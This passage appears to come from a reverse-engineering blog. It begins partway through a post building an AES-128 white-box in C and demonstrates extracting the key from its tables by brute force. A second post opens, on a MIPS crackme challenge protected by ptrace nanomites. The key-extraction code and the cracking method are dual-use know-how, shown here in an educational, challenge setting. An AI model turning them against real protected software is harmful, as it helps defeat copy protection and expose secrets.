            if (j != 0 && (j % 8) == 0)
                printf("\n    ");

            Txor[i][j] = i ^ j;
            printf("0x%.1x", Txor[i][j]);
            if ((j + 1) < 0x10)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 0x10)
            printf(",");
        printf("\n");
    }
    printf("};\n");
    return EXIT_SUCCESS;
}
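Just to make the nibble recombination crystal clear, xoring two double-words through that table boils down to this (a sketch; the encryption code below inlines it for four values at once):

unsigned int xor_dwords(unsigned int x, unsigned int y)
{
    unsigned int r = 0;
    // xor 4 bits at a time, then rebuild the double-word with ors & shifts
    for (unsigned int shift = 0; shift < 32; shift += 4)
        r |= (unsigned int)Txor[(x >> shift) & 0xf][(y >> shift) & 0xf] << shift;
    return r;
}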

This table is directly used by our implementation:

void aes128_enc_wb_step4(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            unsigned int aa = Ty[0][a];
            unsigned int bb = Ty[1][b];
            unsigned int cc = Ty[2][c];
            unsigned int dd = Ty[3][d];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]])  | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]])  | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]])  | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]])  | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 7: Combining TBoxes & Ty tables

The last step aims to combine the Tboxes with the Ty tables, and if you look at the code it doesn't seem really hard. We basically want the table to work this way: 1 byte as input (a for example in the previous code) generates 4 bytes of output.

To compute such a table, you need to compute the Tboxes (or not: you can compute everything without relying on the Tboxes, which is actually what I'm doing), & then you compute Ty[Y][Tboxes[i][j][X]]; this is it, roughly. X, i and j are the unknown variables here, which means we will end up with a table like this:

const unsigned int Tyboxes[9][16][0x100];

Makes sense right?

So here is the code that generates that big table:

int main()
{
[...]
    /// Tyboxes
    /// It's basically Tybox(Tboxes(x))
    unsigned int Tyboxes[9][16][0x100] = { 0 };
    printf("const unsigned int Tyboxes[9][16][0x100] =\n{\n");
    for (size_t r = 0; r < 9; ++r)
    {
        printf("  {\n");

        // ShiftRows(round_keys[r]); <- don't forget we already executed that to compute the Tboxes

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                unsigned char c = S_box[x ^ round_keys[r][i]];
                Tyboxes[r][i][x] = Ty[i % 4][c];

                printf("0x%.8x", Tyboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }

            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 9)
            printf(",");
        printf("\n");
    }
    printf("};\n");

    printf("const unsigned char Tboxes_[16][0x100] = \n{\n");
    for (size_t i = 0; i < 16; ++i)
    {
        printf("  {\n    ");
        for (size_t x = 0; x < 0x100; ++x)
        {
            if (x != 0 && (x % 16) == 0)
                printf("\n    ");

            Tboxes[9][i][x] = S_box[x ^ round_keys[9][i]] ^ round_keys[10][i];
            printf("0x%.2x", Tboxes[9][i][x]);
            if ((x + 1) < 0x100)
                printf(", ");
        }
        printf("\n  }");
        if ((i + 1) < 16)
            printf(",");

        printf("\n");
    }

    printf("};\n\n");
    return EXIT_SUCCESS;
}

We just have to take care of the last round which is a bit different as we saw earlier, but no biggie.

Final code

Yeah, finally, here we are ; the final code of our (not protected) AES128 white-box:

void aes128_enc_wb_final(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned int aa = Tyboxes[i][j * 4 + 0][out[j * 4 + 0]];
            unsigned int bb = Tyboxes[i][j * 4 + 1][out[j * 4 + 1]];
            unsigned int cc = Tyboxes[i][j * 4 + 2][out[j * 4 + 2]];
            unsigned int dd = Tyboxes[i][j * 4 + 3][out[j * 4 + 3]];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]]) | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]]) | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]]) | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]]) | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes_[j][out[j]];
        out[j] = x;
    }
}

It's cute, isn't it?
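And checking that it still encrypts correctly is just a matter of comparing its output against the keyed reference implementation (a sketch, using the key & plain-text that were fed to the table generator above; assumes <assert.h>/<string.h> are included):

unsigned char key[16] = "0vercl0k@doare-e";  // the key baked into the tables
unsigned char plain[16] = "whatdup folks???";
unsigned char ref[16] = { 0 }, wb[16] = { 0 };

aes128_enc_base(plain, ref, key);  // keyed reference
aes128_enc_wb_final(plain, wb);    // key-less white-box
assert(memcmp(ref, wb, 16) == 0);  // same cipher-text, no apparent key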

Attacking the white-box: extract the key

As the title says, this white-box implementation is really insecure: if you have access to an executable embedding that kind of white-box, you just have to extract Tyboxes[0] & do a little magic to recover the key.

If it's not already obvious to you, you just have to remember how we actually compute the values inside those big tables; look carefully at these two lines:

unsigned char c = S_box[x ^ round_keys[r][i]];
Tyboxes[r][i][x] = Ty[i % 4][c];

In our case, r is 0, i is the byte index into round key 0 (which is the AES key) & we can also set x to a constant value: say 0 or 1 for instance. S_box is known, and Ty too, as this transformation is always the same (it doesn't depend on the key). Basically we just need to brute-force round_keys[r][i] with every value a byte can take. If the computed value is equal to the one in the dumped Tyboxes, then we have extracted one byte of the round key & we can go find the next one.

Attentive readers will have noticed that we are not actually going to extract the encryption key per se, but ShiftRows(key) instead (remember that we needed to apply this transformation to build our white-box). But again, ShiftRows not being key-dependent, we can invert this operation easily to recover the plain encryption key this time.

Here is the code that does what I just described:

unsigned char scrambled_key[16] = { 0 };
for (size_t i = 0; i < 16; ++i)
{
    // Remember: Tyboxes[0][i][x] = Ty[i % 4][S_box[x ^ round_keys[0][i]]] ;
    // here we use the dumped entry x = 1 of every table
    unsigned int value = Tyboxes_round0_dumped[i][1];
    // Now we generate the 0x100 possible values for the character 0 & wait to find a match
    for (size_t j = 0; j < 0x100; ++j)
    {
        unsigned char c = S_box[1 ^ j];
        unsigned int computed_value = Ty[i % 4][c];
        if (computed_value == value)
            scrambled_key[i] = j;
    }
}

{
    unsigned char tmp1, tmp2;
    // 8-bits right rotation of the second line
    tmp1 = scrambled_key[13];
    scrambled_key[13] = scrambled_key[9];
    scrambled_key[9] = scrambled_key[5];
    scrambled_key[5] = scrambled_key[1];
    scrambled_key[1] = tmp1;

    // 16-bits right rotation of the third line
    tmp1 = scrambled_key[10];
    tmp2 = scrambled_key[14];
    scrambled_key[14] = scrambled_key[6];
    scrambled_key[10] = scrambled_key[2];
    scrambled_key[6] = tmp2;
    scrambled_key[2] = tmp1;

    // 24-bits right rotation of the last line
    tmp1 = scrambled_key[15];
    scrambled_key[15] = scrambled_key[3];
    scrambled_key[3] = scrambled_key[7];
    scrambled_key[7] = scrambled_key[11];
    scrambled_key[11] = tmp1;
}

printf("Key successfully extracted & UnShiftRow'd:\n");
for (size_t i = 0; i < 16; ++i)
    printf("\\x%.2x", scrambled_key[i]);
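
Since it is easy to get those row rotations wrong (row r of the state lives at indices r, r+4, r+8, r+12, and ShiftRows rotates it left by r bytes), here is a quick throwaway Python cross-check of mine (not from the original tooling) that the rotations above really compute the inverse of ShiftRows:

def shift_rows(s):
    # new[4*col + row] = old[4*((col + row) % 4) + row]
    return [s[(i + 4 * (i % 4)) % 16] for i in range(16)]

def unshift_rows(s):
    return [s[(i - 4 * (i % 4)) % 16] for i in range(16)]

assert unshift_rows(shift_rows(range(16))) == range(16)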

Obfuscating it?

This is basically the part where you have no limits and where you can exercise your creativity & develop stuff. I'll just talk about ideas & obvious things ; a lot of them are directly taken from @elvanderb's challenge, so I guess I owe him yet another beer.

The first things you can do for free are:

  • Unrolling the implementation to make room for craziness
  • Using public LLVM passes on the unrolled implementation to make it even crazier

The other good idea is to try to make the key elements of your implementation less obvious: basically the AES state, the tables & their structures. Those three things give away quite some important information about how your implementation works, so making it a bit harder to figure those points out is good for us. Instead of storing the AES state inside a contiguous memory area of 16 bytes, why not use 16 non-contiguous variables of 1 byte each? You can go even further by using different variables for every round to make it even more confusing.

You can also apply that same idea to the different arrays our implementation uses: do not store them in a contiguous memory area, scatter them all over the memory & transform them into one-dimensional arrays instead.
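
As a tiny illustration, here is a hypothetical Python sketch of that scattering idea, in the same generate-C spirit as the table generators above (Tboxes_ stands for a Python-side copy of the 16x0x100 table we built earlier ; the names & layout are mine, not taken from any real tool):

import random

# Emit 16 independently-named 1-D arrays instead of one big contiguous
# [16][0x100] array ; nothing forces them to be neighbors in .rodata anymore
names = ['tbl_%08x' % random.randint(0, 0xffffffff) for _ in range(16)]
for i in range(16):
    print 'static const unsigned char %s[0x100] = { %s };' % (
        names[i],
        ', '.join('0x%.2x' % Tboxes_[i][x] for x in range(0x100))
    )
# The obfuscated code now spells Tboxes_[i][x] as, say, tbl_1337beef[x]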

We could also imagine a generic array "obfuscation" where you add several "layers" before reaching the value you are interested in (a little sketch follows this list):

  • Imagine an array [1,5,10,11] ; we could shuffle it into [10, 5, 1, 11] and build the associated index table, which would be [2, 1, 0, 3]
  • And now, instead of accessing the first array directly, you first retrieve the correct index in the index table: shuffled[index[0]]
    • Obviously you could have as many indirections as you want
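
Here is that idea as a quick pure-Python sketch (the variable names are mine ; stacking more layers is just a matter of repeating the construction):

import random

original = [1, 5, 10, 11]
# perm[src] tells where the original slot src lands in the shuffled array
perm = range(len(original))
random.shuffle(perm)

shuffled = [None] * len(original)
index = [None] * len(original)
for src, dst in enumerate(perm):
    shuffled[dst] = original[src]
    index[src] = dst

# original[i] is now spelled shuffled[index[i]]
assert all(original[i] == shuffled[index[i]] for i in range(len(original)))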

To make everything ever more confusing, we could build the primitives we need on top of crazy CPU extensions like SSE or MMX ; or even build a complete virtual software-processor!

Do also try to shuffle everything that is "shufflable" ; here is a simple graph that shows the data-dependencies between the lines of our unrolled C implementation (an arrow from A to B means that A needs to be executed prior to B):

[aes.svg: data-dependency graph between the lines of the unrolled implementation]
From here, you have everything you need to move the lines around & generate a "less normal" implementation (even though we can clearly see what I call synchronization points at the end of every round, which are basically the calls to ShiftRows(out) ; but again, we could get rid of those by in-lining them directly, etc.):

def generate_shuffled_implementation_via_dependency_graph(dependency_graph, out_filename):
    '''This function is basically leveraging the graph we produced in the previous function
    to generate an actual shuffled implementation of the AES white-box without breaking any
    constraints, keeping the result of this new shuffled function the same as the clean version.'''
    lines = open('aes_unrolled_code.raw.clean.unique_aabbccdd', 'r').readlines()
    print ' > Finding the bottom of the graph..'
    last_nodes = set()
    for i in range(len(lines)):
        _, degree_o = dependency_graph.degree_iter(i, indeg = False, outdeg = True).next()
        if degree_o == 0:
            last_nodes.add(dependency_graph.get_node(i))

    assert(len(last_nodes) != 0)
    print ' > Good, check it out: %r' % last_nodes
    shuffled_lines = []
    step_n = 0
    print ' > Lets go'
    while len(last_nodes) != 0:
        print '  %.2d> Shuffle %d nodes / lines..' % (step_n, len(last_nodes))
        shuffled_nodes = list(last_nodes)
        random.shuffle(shuffled_nodes, random = random.random)
        shuffled_lines.extend(lines[int(i.get_name())] for i in shuffled_nodes)
        step_n += 1

        print '  %.2d> Finding parents / stepping back ..' % step_n
        tmp = set()
        for node in last_nodes:
            tmp.update(dependency_graph.in_neighbors(node))
        last_nodes = tmp
        step_n += 1

    shuffled_lines = list(reversed(shuffled_lines))
    with open(out_filename, 'w') as f:
        f.write('''void aes128_enc_wb_final_unrolled_shuffled_%d(unsigned char in[16], unsigned char out[16])
{
memcpy(out, in, 16);
''' % random.randint(0, 0xffffffff))
        f.writelines(shuffled_lines)
        f.write('}')
    return shuffled_lines

Anyway, I wish I had time to implement what we just talked about but I unfortunately don't; if you do feel free to shoot me an email & I'll update the post with links to your code :-).

Last words

I hope this little post gave you enough to understand how white-box cryptography kind of works, how important the design of the implementation is, and what sort of problems you can encounter. If you enjoyed this subject, here is a list of cool articles you may want to check out:

Every source file produced for this post has been posted on my github account right here: wbaes128.

Special thanks to my mate @__x86 for proof-reading!

Taming a wild nanomite-protected MIPS binary with symbolic execution: No Such Crackme

Like last year, the French conference No Such Con returns for its second edition in Paris, from the 19th until the 21st of November. And again, the brilliant Eloi Vanderbeken & his mates at Synacktiv have put together a series of three security challenges especially for this occasion. Apparently, the three tasks have already been solved by the awesome @0xfab, who won the competition, hats off :).

To be honest, I couldn't resist trying at least the first step, as I know that Eloi always builds really twisted and nice binaries ; so I figured I should just give it a go!

But this time we are trying something different: this post has been co-authored by both Emilien Girault (@emiliengirault) and me. As we came up with slightly different solutions, we figured it would be a good idea to write them up inside a single post. The article starts with an introduction to the challenge and will then fork, presenting my solution and his.


REcon: Here be dragons

This part is just here to get things started: setting up a debugging environment, learning a bit more about MIPS, and getting an idea of what the binary is actually doing.

MIPS 101

The first interesting detail about this challenge is that it is a MIPS binary ; that's really kind of exotic for me. I'm mainly looking at Intel assembly, so having the opportunity to look at an unknown architecture is always appealing. You know, it's like discovering a new little toy, so I just couldn't help myself & started to read up on the MIPS basics.

This part is going to describe only the essential information you need to both understand and crack the binary wide open ; and as I said, I am not a MIPS expert at all. From what I have seen though, it is fairly similar to what you can see on an Intel x86 CPU:

  • It is little-endian (note that a big-endian version also exists, but it won't be covered in this post),
  • It has way more general purpose registers,
  • The calling convention is similar to __fastcall: you pass arguments via registers, and get the return of the function in $v0,
  • Unlike x86, MIPS is RISC, so it is much simpler to pick up (trust me on that one),
  • Of course, there is an IDA processor,
  • Linux and the regular tools also exist for MIPS, so we will be able to use the "normal" tools we are used to,
  • It also uses a stack, though much less than x86, as most things happen in registers (in this challenge at least).

Setting up a proper debugging environment

The answer here is Qemu, as expected. You can even download fully prepared & working Debian images from aurel32's website.

overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2
overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta
overclok@wildout:~/chall/nsc2014$ cat start_vm.sh
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -vga none -append "root=/dev/sda1 console=tty0" -nographic
overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.2.0-4-4kc-malta (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 Debian 3.2.51-1
[...]
debian-mipsel login: root
Password:
Last login: Sat Oct 11 00:04:51 UTC 2014 on ttyS0
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@debian-mipsel:~# uname -a
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips GNU/Linux

Feel free to install your essentials in the virtual environment ; some tools might come in handy (it should take a bit of time to install them though):

root@debian-mipsel:~# aptitude install strace gdb gcc python
root@debian-mipsel:~# wget https://raw.githubusercontent.com/zcutlip/gdbinit-mips/master/gdbinit-mips
root@debian-mipsel:~# mv gdbinit-mips ~/.gdbinit
root@debian-mipsel:~# gdb -q /home/user/crackmips
Reading symbols from /home/user/crackmips...(no debugging symbols found)...done.
(gdb) b *main
Breakpoint 1 at 0x402024
(gdb) r 'doar-e ftw'
Starting program: /home/user/crackmips 'doar-e ftw'
-----------------------------------------------------------------
[registers]
  V0: 7FFF6D30  V1: 77FEE000  A0: 00000002  A1: 7FFF6DF4
  A2: 7FFF6E00  A3: 0000006C  T0: 77F611E4  T1: 0FFFFFFE
  T2: 0000000A  T3: 77FF6ED0  T4: 77FE5590  T5: FFFFFFFF
  T6: F0000000  T7: 7FFF6BE8  S0: 00000000  S1: 00000000
  S2: 00000000  S3: 00000000  S4: 004FD268  S5: 004FD148
  S6: 004D0000  S7: 00000063  T8: 77FD7A5C  T9: 00402024
  GP: 77F67970  S8: 0000006C  HI: 000001A5  LO: 00005E17
  SP: 7FFF6D18  PC: 00402024  RA: 77DF2208
-----------------------------------------------------------------
[code]
=> 0x402024 <main>:     addiu   sp,sp,-72
    0x402028 <main+4>:   sw      ra,68(sp)
    0x40202c <main+8>:   sw      s8,64(sp)
    0x402030 <main+12>:  move    s8,sp
    0x402034 <main+16>:  sw      a0,72(s8)
    0x402038 <main+20>:  sw      a1,76(s8)
    0x40203c <main+24>:  lw      v1,72(s8)
    0x402040 <main+28>:  li      v0,2

And finally you should be able to run the wild beast:

root@debian-mipsel:~# /home/user/crackmips
usage: /home/user/crackmips password
root@debian-mipsel:~# /home/user/crackmips 'doar-e ftw'
WRONG PASSWORD

Brilliant :-).

The big picture

Now that we have a way of both launching and debugging the challenge, we can open the binary in IDA and start to understand what type of protection scheme is used. As always at that point, we are really not interested in details: we just want to understand how it works and what parts we will have to target to get the good boy message.

After a bit of time in IDA, here is how the binary works:

  1. It checks that the user supplied one argument: the serial
  2. It checks that the supplied serial is 48 characters long
  3. It converts the string into 6 DWORDs (/!\ pitfall warning: the conversion is a bit strange, be sure to verify your algorithm)
  4. The beast forks in two:
    1. [Father] It seems, somehow, this one is driving the son, more on that later
    2. [Son] After executing a big chunk of code that modifies (in place) the 6 original DWORDs, they get compared against the following string [ Synacktiv + NSC = <3 ]
    3. [Son] If the comparison succeeds you win, else you lose

Basically, we need to find the 6 input DWORDs that generate the following ones in output: 0x7953205b, 0x6b63616e, 0x20766974, 0x534e202b, 0x203d2043, 0x5d20333c. We also know that the father is going to interact with its son, so we need to study both pieces of code to be sure we understand the challenge properly. If you prefer code, here is the big picture in C:

int main(int argc, char *argv[])
{
    DWORD serial_dwords[6] = {0};
    if(argc != 2)
        Usage();

    // Conversion
    a2i(argv[1], serial_dwords);

    pid_t pid = fork();
    if(pid != 0)
    {
        // Father
        // a lot of stuff going on here, we will see that later on
    }
    else
    {
        // Son
        // a lot of stuff going on here, we will see that later on

        char *clear = (char*)serial_dwords;
        bool win = memcmp(clear, "[ Synacktiv + NSC = <3 ]", 24) == 0;
        if(win)
            GoodBoy();
        else
            BadBoy();
    }
}
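
By the way, a quick way to double-check those six target DWORDs: they are nothing more than the goal string packed as little-endian 32-bit words. A Python two-liner to convince yourself:

import struct

# '[ Synacktiv + NSC = <3 ]' is 24 bytes, i.e. exactly 6 little-endian DWORDs
print ' '.join('0x%.8x' % d for d in struct.unpack('<6I', '[ Synacktiv + NSC = <3 ]'))
# 0x7953205b 0x6b63616e 0x20766974 0x534e202b 0x203d2043 0x5d20333c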

Let's get our hands dirty

Father's in charge

The first thing I did after having the big picture was to look at the code of the father. Why? The code seemed a bit simpler than the son's one, so I figured studying the father would make more sense to understand what kind of protection we need to subvert. You can even crank up strace to have a clearer overview of the syscalls used:

root@debian-mipsel:~# strace -i /home/user/crackmips $(python -c 'print "1"*48')
[7734e224] execve("/home/user/crackmips", ["/home/user/crackmips", "11111111111111111111111111111111"...], [/* 12 vars */]) = 0
[...]
[77335e70] clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x77491068) = 2539
[77335e70] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7733557c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[...]

That's an interesting output that I didn't expect at all, actually. What we are seeing here is the father driving its son by modifying, potentially (we will find that out later), its context every time the son SIGTRAPs (note waitpid's second argument).

From here, if you are quite familiar with the different existing types of software protections (I'm not saying I am an expert in this field, but I just happen to know that one :-P), you can pretty much guess what that is: nanomites this is!

Nanomites 101

Nanomites are quite a nice protection. Though, it is quite a generic name ; you can really use that protection scheme in whatever way you like: your imagination is the only limit here. To be honest, this was the first time I saw this kind of protection implemented on a Unix system ; really good surprise! It usually works this way:

  1. You have two processes: a driver and a driven ; a father and a son
  2. The driver is attaching itself to the driven one with the debug APIs available on the targeted platform (ptrace here, and CreateProcess/DebugActiveProcess on Windows)
    1. Note that you won't be able to attach yourself to the son, as both Windows and Linux prevent that by design: some people call that part the DebugBlocker
    2. You will be able to debug the driver though
  3. Usually the interesting code is in the son, but again you can do whatever you want. Basically, you have a few rules if you want an efficient protection:
    1. Make sure the driven process can't run without its driver and that they are really tied to each other
    2. The strength of the protection is that strong/intimate bond between the two processes
    3. Design your algorithm such that removing the driver is really difficult/painful/maddening for the attacker
  4. The driven process can call/notify the driver by just SIGTRAPing with an int3/break instruction for example (a minimal sketch of this whole skeleton follows the list)
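
Here is that sketch ; emphatically not the challenge's father, just the recipe boiled down to its simplest expression. I am assuming Linux x86-64, a glibc reachable as 'libc.so.6', and the usual x86-64 ptrace request values:

import ctypes, os, signal

PTRACE_TRACEME, PTRACE_CONT = 0, 7
PTRACE_GETREGS, PTRACE_SETREGS = 12, 13
libc = ctypes.CDLL('libc.so.6', use_errno = True)

pid = os.fork()
if pid == 0:
    # Driven process: ask to be traced & SIGTRAP to notify the driver
    libc.ptrace(PTRACE_TRACEME, 0, 0, 0)
    os.kill(os.getpid(), signal.SIGTRAP)
    # ...the interesting code would live here, peppered with break/int3...
    os._exit(0)

# Driver process: every time the son SIGTRAPs, grab his CPU context,
# fiddle with it & resume him
regs = ctypes.create_string_buffer(512)  # plenty for a user_regs_struct
while True:
    _, status = os.waitpid(pid, 0)
    if os.WIFEXITED(status):
        break
    if os.WIFSTOPPED(status) and os.WSTOPSIG(status) == signal.SIGTRAP:
        libc.ptrace(PTRACE_GETREGS, pid, 0, ctypes.byref(regs))
        # <- a real nanomites driver would patch the program counter here
        libc.ptrace(PTRACE_SETREGS, pid, 0, ctypes.byref(regs))
    libc.ptrace(PTRACE_CONT, pid, 0, 0)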

As I said, I see this protection scheme more like a recipe: you are free to customize it at your convenience really. If you want to read more on the subject, here is a list of links you should check out:

How the father works

Now it is time to look into the details of the father ; here is how it works:

  • The first thing it does is to waitpid until its son triggers a SIGTRAP
  • The driver retrieves the CPU context of the son process and more precisely its program counter: $pc
  • Then we have a huge block of arithmetic computations. But after spending a bit of time studying it, we can see that huge block as a black-box function taking two parameters: the program counter of the son and some kind of counter value (as this code is going to be executed in a loop, this variable is incremented for each SIGTRAP). It generates a single output, a 32-bit value that I call the first magic value. Let's not focus on what the block is actually doing though ; we will develop some tooling in the next part to deal with that :-) so let's keep moving!

[father_code.png: the father's driving loop]

  • This magic value is then used to find a specific entry in an array of QWORDs (606 QWORDs, which is 6 times the number of break instructions in the son -- you will understand that a bit later, don't worry). Basically, the code is going to loop over every single QWORD of this array until finding one that has its high DWORD equal to the magic value. From there you get another magic value, which is the lowest DWORD of the matching QWORD.
  • Another huge block of arithmetic computations follows. Similarly to the first one, we can see it as a black-box function with two inputs: the second magic value and a round index (the son is executing its code 6 times, so this round index will go from 0 to 5 -- again, this will be a bit clearer when we look at the son, so just keep this detail in mind). The output of this function is a 32-bit value. Again, do not study this block, we don't need it.
  • The generated value is in fact a valid code address inside the son ; so straight after the computation, the father modifies the program counter in the previously retrieved CPU context. Once this is done, it calls ptrace with SETREGS to set the new CPU context of the son.

This is roughly what is going to be executed every time the son hits a break instruction ; the father is definitely driving the son. And we can feel it now: the son is going to jump (via its father) through blocks of code that aren't (necessarily) contiguous in memory, so studying the son's code as it is in IDA is quite pointless, as those basic blocks aren't going to be executed in this order.

Long story short, the nanomites are used as some kind of runtime code flow scrambling primitive, isn't it exciting? Told you that @elvanderb is crazy :-).

Gearing up: Writing a symbolic execution engine

At that point, I can assure you that we need some tooling: we have studied the binary, we know how the main parts work and we just need to extract the different equations/formulas used by both the computation of the son's program counter and the serial verification algorithm. Basically the engine is going to be useful to study both the father and the son.

